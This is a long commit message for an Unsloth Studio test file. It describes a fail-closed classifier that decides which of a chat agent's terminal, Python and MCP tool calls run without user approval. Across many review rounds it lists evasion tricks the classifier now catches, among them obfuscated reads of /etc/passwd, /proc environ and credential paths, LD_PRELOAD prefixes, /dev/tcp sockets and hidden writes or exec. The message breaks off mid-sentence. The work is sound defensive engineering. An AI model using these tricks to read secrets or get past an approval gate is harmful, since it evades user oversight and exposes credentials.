unsloth/studio/backend/tests/test_permission_mode.py
Michael Han e1e38419df
Studio: permission levels for chat tool calls (Ask, Approve for me, Off, Full access) (#7079)
* Studio: permission levels for chat tool calls (Ask, Approve for me, Off, Full access)

Replace the Bypass permissions on/off toggle with a four level permission
selector, available in Settings > General (new Permissions section above
Notifications), the chat settings panel, the composer plus menu, and a new
always visible composer pill.

Levels:
- Ask for approval: every local tool call pauses for allow/deny.
- Approve for me: only calls detected as potentially unsafe pause; the
  python/terminal sandbox stays on.
- Off: never pauses; sandbox stays on (previous default behavior).
- Full access: never pauses and the sandbox is disabled. Still requires
  the danger confirmation and is never restored across reloads.

Backend adds permission_mode to the OpenAI compatible and Anthropic
passthrough payloads and threads it through both tool loops. Auto mode
uses a fail closed classifier in tools.py: terminal commands must be on
a read only allowlist with no redirection or substitution, python code
is AST scanned for writes, exec, process and network use, MCP tools
auto run only with read only style names. Unknown tools always ask.

Legacy bypass_permissions and confirm_tool_calls keep their exact
behavior for existing API callers.

* [pre-commit.ci] auto fixes from pre-commit.com hooks

for more information, see https://pre-commit.ci

* Studio permissions: Off is a plain toggle below Full access

Off moves to the bottom of the level menu with a short description and
acts as the feature-off state: the composer pill is hidden entirely
while Off, and reselecting the active level toggles back to Off.

* Studio permissions: higher contrast composer pill text

The permission pill uses a foreground based grey instead of the shared
muted pill color, so it reads darker in light mode and lighter in dark
mode. Full access keeps the danger yellow.

* Studio permissions: panel dropdown layout and shorter tooltip

Chat settings panel: the Bypass permissions label sits on one line with
a full width dropdown underneath, styled like the other panel selects.
Tooltip shortened and wording uses Unsloth instead of Studio.

* Studio permissions: harden auto-mode unsafe detection

Extend the Approve for me classifier to catch write and exec paths that
slipped through:
- terminal: sort -o, tree -o, xxd -r, find -exec/-execdir/-ok/-delete
  and find -fprint/-fprintf/-fls now ask; plain read-only forms still
  auto-run. awk is no longer allowlisted since its program can write and
  call system().
- python: from-imports of mutating names (from os import remove [as rm])
  and star imports now ask.

Found by a fuzz and edge-case simulation matrix; pinned in
test_permission_mode.py.

* Studio permissions: split multi-line terminal commands in auto detection

A shell runs each line as its own command, but shlex reads newlines as
whitespace, so "ls\nrm -rf x" demoted rm to argument position and
auto-ran. Normalize newlines and CR to separators, and treat any all
separator token as a command boundary so runs of blank lines still
split. Found by the simulation matrix; pinned in tests.

* Studio permissions: address review feedback on auto-mode detection

Auto-mode (Approve for me) safety classifier hardening:
- Python: flag any reference to a mutating attribute, not only direct
  calls, so indirect refs (f = os.remove; f(x)) and aliases ask. Detect
  Path.open(mode) write modes and wrap the AST walk to fail closed.
- Terminal: match attached short output flags (sort -o/tmp/out) and keep
  find context across grouping parens so find ( -delete ) asks.
- Both: ask before reads that escape the sandbox workdir via parent
  traversal or hit credential paths (.ssh, .aws, id_rsa, .pem, etc.).

permission_mode plumbing:
- Fold permission_mode=full into bypass_permissions at the request model
  so route-level confirm-gate guards see it as bypass.
- Reject ask/auto on the Anthropic Messages server-tools path, which has
  no confirmation channel (mirrors the confirm_tool_calls rejection).
- Keep forced RAG autoinject in auto mode: the safe search_knowledge_base
  retrieval never gates, so derive the skip from the real confirm need.
- Reset all local preferences now also clears the legacy confirm key so a
  reset restores the fresh default instead of the old level.

Regression tests added for each case.

* [pre-commit.ci] auto fixes from pre-commit.com hooks

for more information, see https://pre-commit.ci

* Studio permissions: close auto-mode classifier gaps from review round 2

Auto mode ("Approve for me") let a few mutating calls through as safe:

- os.open(...) always creates/writes a descriptor, so treat it as unsafe
  even though builtin open in read mode stays safe.
- fd -x/--exec/-X/--exec-batch runs a command per match; scan for these
  alongside find's -exec/-delete.
- tempfile writes artefacts and hands back writable handles, so importing
  it now asks.
- Calling the result of a call (getattr(os, "remove")("x"), partials) is a
  dynamic target the AST can't vet, so fail closed.
- An MCP tool whose name pairs a read verb with a mutating one
  (get_or_create_issue, read_and_delete_file) no longer auto-runs on the
  read prefix alone.

Also fold permission_mode="off" into confirm_tool_calls=False on both
request models so the non-stream route guard sees the disabled gate, and
drive the Confirm tool calls toggle off permission_mode="ask" so auto no
longer shows it on.

* Harden auto-mode classifier and normalize bypass to full for PR #7079

Approve for me now asks for a few cases it previously auto-ran:
- os.open via an os alias (import os as o; o.open(path, O_CREAT))
- pathlib symlink_to / hardlink_to / link_to
- importlib.import_module dynamic imports
- os.mkfifo / os.mknod / os.utime

Also fold bypass_permissions into full when a stale ask/auto permission_mode
is sent alongside it, so the Anthropic route guard no longer 400s those legacy
callers. Adds classifier and request-model regression tests.

* Close more auto-mode classifier gaps for PR #7079

Approve for me now asks for cases the review surfaced:
- builtin open aliased to a name (f = open; from builtins import open as w)
  or looked up dynamically (globals()['open'])
- pickle / marshal / shelve / dill deserialization
- io.FileIO write handles
- sort --compress-program (runs an external program)
- MCP names carrying save/archive/submit/commit/push/sync/register verbs

Also refine the attribute open() write check so an explicit read mode
(ZipFile.open(name, "r")) stays auto while os.open flags still ask. Adds
test coverage for each case.

* [pre-commit.ci] auto fixes from pre-commit.com hooks

for more information, see https://pre-commit.ci

* Close three more auto-mode gaps for PR #7079

- rg runs an arbitrary program per file via --pre / --hostname-bin, so
  "Approve for me" now asks for those flags (rg is on the read-only
  allowlist).
- A path-qualified command token (./ls, /tmp/cat) is an arbitrary
  executable, not the trusted utility its basename matches, so it asks
  before running.
- A direct /chat/completions caller that sets permission_mode ask/auto
  but omits the legacy confirm_tool_calls flag now self-enables the
  confirmation gate, so tools can no longer run ungated on that path.

Adds classifier and request-model tests for each case.

* Close auto-mode classifier gaps from review round 3 for PR #7079

Approve for me now asks for cases the latest pass surfaced:
- short-option clusters bundling a write flag (sort -uo out => -u -o)
- procfs reads that leak a process env/args/memory
  (cat /proc/self/environ, /proc/PID/cmdline, maps)
- env-assignment prefixes that change command lookup/loading
  (LD_PRELOAD=x ls, PATH=. ls, IFS=x ls); benign FOO=1 cmd stays auto
- os.open imported as a bare callable (from os import open as o)

Also drops ps from the safe terminal allowlist: its BSD environment
flags (ps auxe, ps eww) dump a parent process's unscrubbed env and
cannot be flag-parsed reliably, so ps always asks now. Adds classifier
tests for each case.

* [pre-commit.ci] auto fixes from pre-commit.com hooks

for more information, see https://pre-commit.ci

* Close auto-mode classifier gaps from review round 4 for PR #7079

Terminal (Approve for me now asks for these):
- cd dropped from the safe allowlist: cd /; cat etc/passwd moves the
  shell out of the session workdir so a later relative read escapes it
- env -C/--chdir (workdir escape) and -S/--split-string (builds a fresh
  command line); wrapper flags are now checked
- /etc//passwd and /etc/./passwd normalize to /etc/passwd before the
  sensitive-path scan
- a sensitive path split across an assignment and an argument
  (p=/etc; cat $p/passwd) via best-effort NAME=value expansion

Python:
- builtins.exec / builtins.eval attribute calls (dynamic code execution)
- destructured open aliases (f, _ = (open, print); f('out', 'w'))
- a sensitive path composed from literals (os.path.join('/etc','passwd'),
  '/etc' + '/passwd')
- ZipFile/TarFile write modes (ZipFile(name, 'w')); the reader stays auto

Adds classifier tests for each case.

* [pre-commit.ci] auto fixes from pre-commit.com hooks

for more information, see https://pre-commit.ci

* Close auto-mode classifier gaps from review round 5 for PR #7079

Terminal (Approve for me now asks for these):
- procfs reads hidden by shell quotes (cat /proc/$PPID/enviro''n) or
  quoted/nested-variable assignments (p="/proc/$PPID"; cat $p/environ):
  quotes are stripped and NAME=value prefixes expanded before the scan
- LESSOPEN/LESSCLOSE, which make less run an input preprocessor command

Python:
- os.chdir / os.fchdir, which move the cwd so a later relative read
  escapes the sandbox workdir
- sensitive paths composed via a pathlib / chain (Path('/etc') / 'passwd')
  or an f-string of literals (f'/proc/{pid}/environ')
- runpy (import) and runpy.run_path / run_module, which run arbitrary code

Adds classifier tests for each case.

* [pre-commit.ci] auto fixes from pre-commit.com hooks

for more information, see https://pre-commit.ci

* Close auto-mode classifier gaps from review round 6 for PR #7079

Approve for me now asks for these:
- a mutating callable reached through a getattr alias
  (rm = getattr(os, "remove"); rm("f")): calls through a getattr-bound
  name fail closed
- compound MCP tool names carrying clone/checkout/comment/fork/tag/
  invite/share, which start with a read verb but still mutate
- a sensitive path hidden behind a glob (cat /e??/passwd,
  cat /e[t]c/passwd): a ? / * / [..] token is matched against the
  sensitive-file set and bracket classes are de-obfuscated; benign
  globs (ls *.py) stay auto

Also run first-pass RAG retrieval in off mode: like auto, off never
prompts, so a direct caller passing a stale confirm flag should not lose
document retrieval (both tool loops).

Adds classifier tests for each case.

* [pre-commit.ci] auto fixes from pre-commit.com hooks

for more information, see https://pre-commit.ci

* Close auto-mode classifier gaps from review round 7 for PR #7079

Approve for me now asks for these:
- __builtins__.exec / __builtins__.eval (dynamic code via the dunder)
- terminal reads that hide a credential path behind a backslash escape
  (cat /et\c/passwd)
- read-named MCP filesystem calls pointed at a credential path
  (mcp__fs__read_file {"path": "/etc/passwd"})
- compound MCP names carrying append / prepend
- open aliased through a subscript or builtins attribute
  (f = globals()["open"]; f = builtins.open) then called to write
- open(..., **{"mode": "w"}) where a kwargs splat hides the write mode
- a sensitive path with a dynamic segment (open(f"/etc/{name}"),
  os.path.join("/etc", name)); /tmp/{name} stays auto
- urllib3 networking

Also stop folding permission_mode ask/auto into confirm_tool_calls for
external-provider requests: that branch rejects confirm_tool_calls with
tools, and the mode only governs local tool calls. Local requests still
self-gate. Adds tests for each case.

* Close auto-mode classifier gaps from review round 8 for PR #7079

Approve for me now asks for these:
- dbm on the unsafe-module list: dbm.open(file, "c"/"n") creates files,
  and importing the family signals a persistence writer
- reads of ~/.azure and ~/.config/gh credential stores (Azure/GitHub
  tokens), in terminal, MCP arguments, and Python literals
- compound MCP names carrying upsert / assign

Adds classifier tests for each case.

* Gate secret mounts and fix the composer pill count for PR #7079

- Add Docker/Kubernetes secret mount dirs (/run/secrets,
  /var/run/secrets) to the sensitive-path checks, so Approve for me asks
  before reading injected credentials (terminal, MCP args, Python).
- Count the always-visible permission pill in the composer's compact
  threshold so labels collapse at the intended width instead of
  overflowing by one pill.

Adds classifier tests for the secret mount paths.

* Close auto-mode classifier gaps from review round 10 for PR #7079

Approve for me now asks for these:
- qualified pathlib constructors (pathlib.Path('/etc') / name), folded
  the same as bare Path(...), so a dynamic sensitive path is detected
- open aliased through an annotated assignment (f: object = open;
  f('out', 'w')), tracked like a plain assignment
- recursive searches rooted at an absolute path (grep -R TOKEN /home,
  rg TOKEN /, fd pattern /etc), which read host files outside the
  sandbox tree; sandbox-relative searches stay auto

Adds classifier tests for each case.

* [pre-commit.ci] auto fixes from pre-commit.com hooks

for more information, see https://pre-commit.ci

* Close auto-mode classifier gaps from review round 11 for PR #7079

Approve for me now asks for these terminal reads, which bash would
expand into a sensitive path only after the classifier had approved:
- a glob that resolves into a secret mount or credential dir
  (cat /r?n/secrets/hf_token, cat /root/.s??/id_rsa)
- a recursive search rooted at a tilde home (grep -R TOKEN ~root,
  grep -R TOKEN ~/logs)
- a brace expansion that builds a credential path (cat /etc/pass{w,}d)
- a default/alternate parameter expansion that builds one
  (cat /etc/pass${x:-wd})
- an input redirection that hides a glob (cat </e??/passwd)

And these python calls:
- a str.format-built sensitive path (open('/etc/{}'.format('passwd')))
- writer methods that persist to disk without open() (numpy.save,
  Image.save, plt.savefig, DataFrame.to_csv, json.dump)

Segment-wise directory matching keeps benign globs (ls /home/*/projects)
auto. Adds regression tests for each case and its safe counterpart.

* Close auto-mode classifier gaps from review round 12 for PR #7079

Approve for me now asks for these too:
- a terminal read whose parent traversal hides behind a redirection with
  no following space (cat <../../notes)
- a python read whose path is built with str.join
  (open(''.join(['/etc', '/passwd']))), told apart from os.path.join
- a dynamic-code builtin reached through an alias
  (from builtins import eval as e; e(...); x = builtins.exec; x(...))

Adds regression tests for each case and its safe counterpart.

* Close auto-mode classifier gaps from review round 13 for PR #7079

Approve for me now asks for these too:
- a recursive search whose root is hidden behind an assignment
  (p=/; grep -R TOKEN $p): the recursive-root test now runs on the
  assignment-expanded tokens as well
- a python read whose sensitive path is split through a literal variable
  (base = '/etc'; open(base + '/passwd')), including via an f-string
- numpy ndarray.tofile, which persists without open()
- a sequence brace read (cat /etc/pass{w..w}d), expanded alongside the
  comma brace form before the sensitive-path scan

Adds regression tests for each case and its safe counterpart.

* [pre-commit.ci] auto fixes from pre-commit.com hooks

for more information, see https://pre-commit.ci

* Close auto-mode classifier gaps from review round 14 for PR #7079

Approve for me now asks for these python reads that assemble a sensitive
path in a form the fold did not yet recognize:
- a pathlib object reused through a name (p = Path('/etc'); p / 'passwd')
- old-style percent formatting ('%s/%s' % ('/etc', 'passwd'))
- Path.joinpath ('/etc'.joinpath('passwd'))
- a bytes path literal (open(b'/etc/passwd'))

And these terminal reads, which bash expands into a sensitive path only
after the classifier had approved:
- a substring parameter expansion off an assignment
  (p=passwd; cat /etc/${p:0:6})
- an ANSI-C quoted path (cat $'/etc/pass\x77d')
- a glob into an Azure or GitHub CLI config dir
  (cat /home/*/.az?re/..., cat /home/*/.config/g?/...)

Adds regression tests for each case and its safe counterpart.

* [pre-commit.ci] auto fixes from pre-commit.com hooks

for more information, see https://pre-commit.ci

* Close auto-mode classifier gaps from review round 15 for PR #7079

Approve for me now asks for these terminal reads, which bash expands into
a sensitive path only after the classifier had approved:
- a per-thread procfs env alias (cat /proc/$PPID/task/$PPID/environ)
- a recursive root behind a default parameter (grep -R TOKEN ${root:-/home})
- a path built by pattern replacement (p=passXd; cat /etc/${p/X/w})

And these python reads:
- a pathlib .parent/.parents chain that escapes the session workdir
  ((Path.cwd().parent / 'other' / 'notes').read_text())
- a sensitive path resolved through glob (glob.glob('/e??/passwd')[0])

Adds regression tests for each case and its safe counterpart.

* [pre-commit.ci] auto fixes from pre-commit.com hooks

for more information, see https://pre-commit.ci

* Close auto-mode classifier gaps from review round 16 for PR #7079

Approve for me now asks for these terminal reads, which bash expands into
a sensitive path only after the classifier had approved:
- a case-modifying parameter expansion (p=PASSWD; cat /etc/${p,,})
- a mutating find action hidden behind an assignment (f=-delete; find . $f)
- a glob assembled through an assignment (g=e??; cat /$g/passwd)
- a POSIX bracket class glob (cat /etc/pass[[:lower:]]d)

And these python reads/writes:
- a glob pattern folded from a literal variable
  (base='/e??'; glob.glob(base + '/passwd'))
- a directly imported os.path.join (from os.path import join; join('/etc', 'passwd'))
- a directly imported writer (from numpy import save; save(...))
- an aliased pathlib constructor (from pathlib import Path as P; P('/etc') / 'passwd')

The find/fd and glob scans now run on the assignment/parameter-expanded
command, and pathlib/join/writer import aliases are tracked. Adds
regression tests for each case and its safe counterpart.

* [pre-commit.ci] auto fixes from pre-commit.com hooks

for more information, see https://pre-commit.ci

* Close auto-mode gaps from review round 17 for PR #7079

Two fixes:
- Gate sqlite3 in auto mode. sqlite3.connect(path) creates or mutates a
  database file (and runs DDL/DML) with no open()/writer attribute for
  the AST checks to catch, so treat the module like dbm and ask.
- Only self-enable confirm_tool_calls for Studio's own tool loop. The
  ask/auto fold previously set confirm on every non-provider request,
  including a plain client-tool passthrough (client-supplied tools that
  Studio does not execute), which then tripped the local-tool
  streaming-confirm route guard and rejected the passthrough. Restrict
  the fold to requests that actually ask Studio to run tools
  (enable_tools / enabled_tools / mcp_enabled).

Adds regression tests for the sqlite3 write and for the passthrough vs
tool-loop confirm behavior.

* [pre-commit.ci] auto fixes from pre-commit.com hooks

for more information, see https://pre-commit.ci

* Close auto-mode gaps from review round 18 for PR #7079

Classifier (auto mode asks for these):
- os.open through a module alias (import os as o; o.open(...)); os/posix
  aliases are tracked like the literal module name.
- less/more pagers, whose escapes (+cmd, !shell, -o/--log-file, LESSOPEN)
  can run a command or write a file the command-name allowlist cannot
  see, so they are no longer auto-approved.
- a read-named MCP tool carrying a mutating query
  (query_database {"query": "DELETE FROM runs"}); DML/DDL statements are
  matched as whole statements so a natural-language query that merely
  contains "delete" stays safe.
- ML persistence helpers (save_pretrained / save_file / save_model /
  save_weights / save_lora / save_checkpoint) that export weights to disk.

Route:
- Honor CLI-forced tools when deriving the confirm gate. When a process
  policy (unsloth run --enable-tools) opens the local tool loop without a
  request-level tool signal, a permission_mode ask/auto request now
  derives confirm at the route (GGUF and safetensors paths) so the mode
  still gates the call, and a non-streaming ask/auto request is rejected
  rather than running unprompted. A plain client-tool passthrough (no
  local loop) is unaffected.

Adds regression tests for each case and its safe counterpart.

* [pre-commit.ci] auto fixes from pre-commit.com hooks

for more information, see https://pre-commit.ci

* Close auto-mode classifier gaps from review round 19 for PR #7079

Approve for me now asks for these too:
- a terminal read whose path is built by indirect parameter expansion
  (x=passwd; p=x; cat /etc/${!p})
- a bash /dev/tcp or /dev/udp redirection, which opens a network socket
  (cat </dev/tcp/host/port)
- a python read via pathlib's receiver-plus-pattern glob
  (Path('/etc').glob('passw?'))
- a python read whose sensitive root passes through a normalizer
  (os.path.abspath('/etc'), Path('/etc').resolve())
- a pickle-backed loader that can execute code on load
  (torch.load, joblib.load, pandas.read_pickle), tracked through module
  import aliases
- compiled code wrapped into a callable (compile(...) + types.FunctionType)

Adds regression tests for each case and its safe counterpart.

* Honor unset permission_mode as ask across the local tool loop for PR #7079

Three gaps where an omitted permission_mode did not behave as the
documented default ("ask"):

- The frontend only sent permission_mode / confirm_tool_calls /
  bypass_permissions when a tool pill was on. A process policy
  (unsloth run --enable-tools) can open the tool loop with no pill, so
  the backend never saw the selected gate. Send the three permission
  fields at the top level of every local chat payload instead.

- The backend read payload.confirm_tool_calls directly at the
  pre-switch guard and both late per-backend derivations, so an unset
  mode fell through as no-gate even for an explicit ask/auto. Add
  _permission_mode_confirm(payload): explicit confirm_tool_calls wins,
  explicit ask/auto engage the gate, off/full never prompt, and an
  unset mode defaults to ask only where realizable (streaming), keeping
  the legacy no-gate run for non-streaming unset requests.

- A forced ask/auto tool loop (CLI --enable-tools) with no stream now
  400s at the pre-switch guard before evicting the resident model,
  matching the existing confirm-without-stream rejection.

Adds test_permission_mode_confirm_derivation covering the derivation
truth table.

* [pre-commit.ci] auto fixes from pre-commit.com hooks

for more information, see https://pre-commit.ci

* Declare permission_mode and bypass_permissions on the local chat request type

The previous change moved permission_mode, confirm_tool_calls and
bypass_permissions to the top level of the local chat payload. They had
lived inside a conditional spread, which is not subject to excess
property checking, so the fields were never declared on
OpenAIChatCompletionsRequest. At the top level tsc flagged
permission_mode as unknown (TS2322), failing the frontend build and
every job whose Studio install builds the frontend.

Add permission_mode and bypass_permissions to the request interface
(confirm_tool_calls was already present).

* Close auto-mode classifier gaps from review round 21 for PR #7079

Auto mode ("Approve for me") now asks for these too:
- a pathlib read built from a concrete constructor (PosixPath, WindowsPath
  and their Pure* forms), which the folder previously ignored so
  PosixPath('/etc') / 'passwd' lost its /etc root and ran unprompted
- a terminal or python read of the ssh host keys under /etc/ssh, which
  the sensitive-path regex only covered for passwd/shadow/sudoers
- a read whose path variable is reassigned: the whole-tree pre-scan kept
  the last binding, so base = '/etc'; open(base + '/passwd'); base = 'data'
  folded to data/passwd and ran even though execution reads /etc/passwd;
  any multiply-bound name now folds to the escape sentinel and asks

Also stop the pre-switch guard from rejecting a plain client-tool
passthrough. permission_mode only implies the confirm gate for Studio's
own local tool loop (enable_tools / enabled_tools / mcp_enabled); a
non-streaming client-tool passthrough that carries permission_mode
ask/auto (confirm_tool_calls left unset by the validator) must forward to
the provider branch. Only an explicit confirm_tool_calls=True still forces
the local-confirm rejection there.

Adds regression tests for each case and its safe counterpart.

* Fix permission-pill compaction count and Full-access confirm sync for PR #7079

Two frontend consistency issues in the permission-level UI:

- The composer collapses tool pills to icons above four, but the count
  left out the permission pill, which renders in every mode except off.
  With one optional pill also shown the row reached five pills without
  collapsing and could overflow. Count the pill when it is visible
  (permission_mode != off).

- Entering Full access via setPermissionMode('full') or
  setBypassPermissions(true) left confirmToolCalls at its previous value,
  so a Full-access run (which sends confirm_tool_calls=false) could still
  report confirmations as enabled in response metadata. Set
  confirmToolCalls false at both entry points.

* Close auto-mode classifier gaps from review round 23 for PR #7079

Auto mode ("Approve for me") now asks for these too:
- a command using an abbreviated GNU long option that reaches a
  write/exec action (sort --out= for --output, env --ch= for --chdir,
  fd --base-dir= for --base-directory); a prefix of an unsafe long flag
  now fails closed
- printf -v NAME, which assigns to a shell variable, so
  printf -v PATH %s .; ls can rewrite PATH and run ./ls unprompted
- fd --base-directory / --search-path, which move the search root
  outside the session workdir without any positional slash token
- an MCP tool whose compound read name carries a copy-style mutator
  (read_and_copy_file, get_and_snapshot_volume): copy, duplicate,
  import, export, download, backup, restore, snapshot, mirror

Also treat an omitted permission_mode as its documented default ("ask")
on the Anthropic Messages server-tool path. That branch has no
confirmation channel and already rejects explicit ask/auto, so an
omitted mode now falls into the same rejection instead of silently
running server tools unprompted, unless the caller opted out with
confirm_tool_calls=false (the legacy equivalent of "off"). off/full and
that opt-out still run; the two routing tests that relied on the old
implicit run now set permission_mode="off".

Adds regression tests for each case and its safe counterpart.

* [pre-commit.ci] auto fixes from pre-commit.com hooks

for more information, see https://pre-commit.ci

* Refine permission gating from review round 24 for PR #7079

Four fixes from the latest review:

- Anthropic Messages server tools: an omitted permission_mode no longer
  rejects a request that only runs safe server tools (web_search), so
  existing Anthropic callers keep working. It still rejects an omitted
  mode when a local tool (terminal/python) is selected, and an explicit
  ask/auto is still rejected outright. off/full and a
  confirm_tool_calls=false opt-out always run.

- Pre-switch confirm-without-stream guard: use
  _explicit_studio_tool_loop_requested (the same predicate the
  passthrough router uses) instead of the policy-inclusive
  _effective_enable_tools, so a process --enable-tools policy no longer
  turns a client-tool passthrough into a local-loop rejection.

- Auto mode now asks for `uniq INPUT OUTPUT`: uniq writes its second
  file positional, so a second positional (numeric flag values skipped)
  is treated like `sort -o`. A lone `uniq file` or piped `... | uniq`
  stays safe.

- MCP mutation check now strips SQL comments before matching, so
  DELETE/**/FROM and UPDATE/**/users (comment-as-whitespace) no longer
  slip past the DML/DDL denylist.

Adds regression tests for each case and its safe counterpart.

* [pre-commit.ci] auto fixes from pre-commit.com hooks

for more information, see https://pre-commit.ci

* Close auto-mode gaps from review round 25 for PR #7079

Auto mode ("Approve for me") now asks for these Python cases too:
- a bare archive constructor with a write mode (from zipfile import
  ZipFile; ZipFile('out.zip', 'w')), tracked through import aliases like
  the zipfile.ZipFile attribute call already was
- a dynamic lookup aliased through getattr (g = getattr;
  rm = g(os, 'remove'); rm('file')), not just direct getattr(...) calls
- a callable that wraps open or a writer via functools.partial
  (w = partial(open, mode='w'); w('out.txt')), which hides the write mode

Also:
- Always-safe tools (render_html) stream their early provisional canvas
  card in auto mode again. The provisional-card guard mirrored the raw
  confirm flag, which suppressed the early card under Approve-for-me; it
  now reuses the auto-mode safety decision (is_always_safe_tool).
- The assistant-ui composer no longer counts the permission pill toward
  its collapse threshold when the level is Off (the pill renders null
  there), matching the other composer.

Adds regression tests for each case and its safe counterpart.

* [pre-commit.ci] auto fixes from pre-commit.com hooks

for more information, see https://pre-commit.ci

* Align permission-mode confirm guards with the router (review round 26)

Three pre-switch confirm-gate checks disagreed with how the tool
loop actually enters, so a valid request could 400 (or an invalid
one could evict the resident model) at the wrong point:

- The /chat/completions pre-switch guard only looked at explicit
  request fields, so a process --enable-tools policy that forces the
  loop on (request omits enable_tools, no client tools) slipped past
  it and only 400ed after _maybe_auto_switch_model had swapped the
  model. It now mirrors the router's own loop-entry gate
  (_effective_enable_tools or mcp, tool_choice="none" disabling it
  unless explicitly asked) while still deferring to client-tool
  passthrough, so the policy-forced case is caught before the switch.

- The ChatCompletionRequest full/off fold treated enabled_tools by
  itself as a local-loop request and set confirm_tool_calls=True.
  The router never starts the loop on enabled_tools alone (it only
  filters which tools run), so a non-streaming passthrough carrying
  client tools plus enabled_tools 400ed instead of routing verbatim.
  The fold now keys off the same enable_tools / mcp_enabled signals.

- The Anthropic /v1/messages unsupported-mode rejection (ask/auto,
  or an omitted mode selecting terminal/python) ran inside the
  post-switch server-tools block, so an invalid request evicted the
  resident model before the 400. It now runs before the auto-switch,
  determined from the requested server tools, like the neighboring
  malformed- and mixed-tool guards.

Adds regressions for each: a policy-forced non-streaming ask/auto
guard rejection that never reaches the switch, an enabled_tools-only
passthrough that keeps confirm unset, and an Anthropic rejection that
precedes _maybe_auto_switch_model.

* [pre-commit.ci] auto fixes from pre-commit.com hooks

for more information, see https://pre-commit.ci

* Close auto-mode classifier gaps from review round 27 for PR #7079

Auto mode ("Approve for me") now asks for these host-mutating or
host-reading cases it previously ran unprompted (the sandbox does not
jail filesystem reads, and terminal commands can change host state):

- Destructured string literals fold into the scanned path now, so
  base, leaf = ('/etc', 'passwd'); open(base + '/' + leaf).read()
  resolves to /etc/passwd and asks, like the single-assignment form
  already did. The tuple/list unpacking branch tracked only aliases to
  open; it now also binds literal and folded-path elements.
- pathlib name rewrites fold to the rewritten path:
  Path('/etc/x').with_name('passwd').read_text() (and with_stem /
  with_suffix) spell no literal /etc/passwd but resolve to it, so they
  are folded and caught. Benign in-sandbox rewrites stay safe.
- hostname NAME (or -F/--file, -b/--boot) sets the hostname, so a
  positional or a set flag asks; bare hostname and the display flags
  (-f/-i/-I/...) stay read-only.
- date -s/--set STRING and the bare MMDDhhmm... positional set the
  system clock and now ask; the display forms stay read-only (+FORMAT,
  -u/-R, and -d/-r/-f whose following value is skipped so date -d
  tomorrow is not mistaken for a clock-setting positional).

Adds regression rows for each gap and its safe counterpart.

* [pre-commit.ci] auto fixes from pre-commit.com hooks

for more information, see https://pre-commit.ci

* Close more auto-mode classifier gaps from review round 28 for PR #7079

Auto mode ("Approve for me") now asks for these cases too:

- Mapping-style %-formatted paths. '/etc/%(f)s' % {'f': 'passwd'} folds
  to /etc/passwd and asks; a dynamic value or a non-literal mapping
  leaves the NUL marker so /etc/<dynamic> still fails closed. The path
  folder previously handled only tuple/scalar % right-hand sides and
  returned None for a dict, hiding the sensitive segment.
- A read-named MCP database tool carrying PostgreSQL COPY. COPY ... FROM
  bulk-loads a table and COPY ... TO writes a server-side file, so both
  are matched as mutating queries like DELETE/UPDATE already were. A
  'copy' substring in a column name stays safe (word boundary).
- logging file handlers. logging.FileHandler('out.log', mode='w') (and
  the default append mode, RotatingFileHandler/TimedRotatingFileHandler/
  WatchedFileHandler, and the bare from-import form) create or truncate
  a file like open(..., 'w'), so they are classified as writer calls.
  StreamHandler / NullHandler and logging reads stay safe.

Adds regression rows for each gap and its safe counterpart.

* Fix writer aliases, GraphQL mutations, and auto server tools (review round 29)

- Auto-mode Python: an aliased writer or archive constructor is tracked
  like the existing open alias, so from numpy import save; s = save;
  s('out.npy', arr) (and z = ZipFile; z('a.zip', 'w'), incl. the
  destructured forms) ask instead of running the write unprompted. A
  benign builtin alias (x = len) stays safe.
- Auto-mode MCP: a read-named tool carrying a GraphQL mutation now asks.
  query_graphql {"query": "mutation { deleteIssue(id: 1) }"} matches a
  leading mutation keyword (GraphQL uses # comments, so it scans the raw
  payload); GraphQL read queries stay safe.
- Anthropic /v1/messages: permission_mode "auto" no longer 400s a
  safe-only server-tool selection. auto only needs a confirmation
  channel for an unsafe call, so like the omitted default it runs for
  web_search / RAG / render and rejects only when a gate-needing local
  terminal/python tool is selected. ask still always rejects (it asks
  per call, which this passthrough cannot honor). The rejection stays
  ahead of the model auto-switch.

Adds regression rows/cases for each.

* [pre-commit.ci] auto fixes from pre-commit.com hooks

for more information, see https://pre-commit.ci

* Gate asyncio spawn, net clients, default-captured open; allow safe-only auto (round 30)

Auto-mode Python now asks for more process/network/write vectors:
- asyncio process spawners (asyncio.create_subprocess_exec/shell and a
  loop's subprocess_exec/shell) run an arbitrary program without the
  terminal blocklist, so they gate like os.system/subprocess.
- stdlib network clients imaplib / poplib / nntplib / xmlrpc(.client) /
  webbrowser open outbound connections the sandbox does not namespace
  off, so their import asks like the other network modules.
- a callable captured as a function or lambda parameter default
  (def f(o=open): o('out', 'w')) now binds that parameter into the same
  alias set, so the later write through it is gated. A benign default
  (o=len) stays safe.

Also, permission_mode "auto" no longer 400s a non-streaming local tool
request whose selection is always-safe-only (web_search / RAG / render).
auto only prompts for a classifier-flagged call, so a safe-only auto
request needs no stream, while ask, an explicit confirm_tool_calls=true,
MCP, and an unrestricted or unsafe selection still require it. Applied
via a shared _confirm_gate_needs_stream helper at the pre-switch, GGUF,
and safetensors confirm-stream guards; the loop's per-call confirm flag
is unchanged.

Adds regression rows/cases for each.

* [pre-commit.ci] auto fixes from pre-commit.com hooks

for more information, see https://pre-commit.ci

* Catch brace-glob paths and attribute writer aliases; unfold auto (round 31)

- Terminal auto mode now runs the glob-sensitive scan over every
  expansion candidate, so a brace-expanded glob (cat /e{t,}c/pass?d,
  which bash expands to /etc/pass?d and then globs to /etc/passwd) asks.
  Brace expansion alone spells no literal /etc/passwd and the glob only
  resolves once the brace group is expanded, so scanning both together
  is required. A benign brace + glob stays safe.
- Python auto mode now tracks a mutating attribute captured as a plain
  name: s = np.save; s('out.npy', arr) binds a writer alias, a captured
  .open bound method (p = Path('out').open; p('w')) fails closed on any
  call since its mode position varies, and z = zipfile.ZipFile is gated
  like the bare import. A benign attribute alias (x = np.mean) stays safe.
- permission_mode "auto" is no longer folded to confirm_tool_calls=true
  on the request model. Folding it defeated the safe-only-selection
  exception in _confirm_gate_needs_stream (an explicit confirm forces
  stream=true), so a non-streaming safe-only auto request was rejected.
  Leaving it unset lets the route apply the exception; the mode still
  drives the loop's per-call gate. "ask" still folds (it gates every
  call).

Adds regression rows/cases for each.

* Harden SQL/GraphQL/writer classification and passthrough guards (round 32)

MCP argument mutation detection (read-named query tools):
- CREATE DDL now matches modifiers and the broader object set, so
  CREATE OR REPLACE VIEW, CREATE UNIQUE INDEX, CREATE TEMP TABLE,
  CREATE MATERIALIZED VIEW and CREATE FUNCTION ask.
- Stored-procedure invocation (CALL proc(...), EXEC/EXECUTE) and VACUUM
  ask; a natural-language "call me back" stays safe via the trailing
